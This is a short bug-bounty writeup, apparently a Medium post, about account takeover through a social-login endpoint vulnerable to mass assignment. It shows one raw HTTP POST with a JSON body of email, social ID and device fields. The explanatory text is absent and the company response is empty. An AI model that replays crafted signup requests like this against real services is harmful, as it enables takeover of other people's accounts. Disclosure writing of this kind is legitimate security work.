Story of Account Takeover : Using Social Login with Mass Assignment Vulnerability to hack accounts !

This is my first writeup about the Account Takeover which I found on a private program.

POST /signup/users/socialLogin HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 834
Host: api.redacted.com
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.2.1

{“profile_picture”:”http://graph.facebook.com/3061xxxxxxxxx/picture?type=large","emailId":"example@gmail.com","socialType":"FB","fname":"test","pincode":"","dob":"","mobile":"","city":"","gender":"","androidId":"3c91804d96d13669","deviceToken":"xxxx","appVersion":"1.0.0|10","country":"","socialId":"306199919","addressl2":"","lname":"Test"}

Response from the company:

Connect with me on my LinkedIn and Twitter

LinkedIn: https://www.linkedin.com/in/mohammad-kaif-security/

Twitter: https://twitter.com/_mkahmad

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store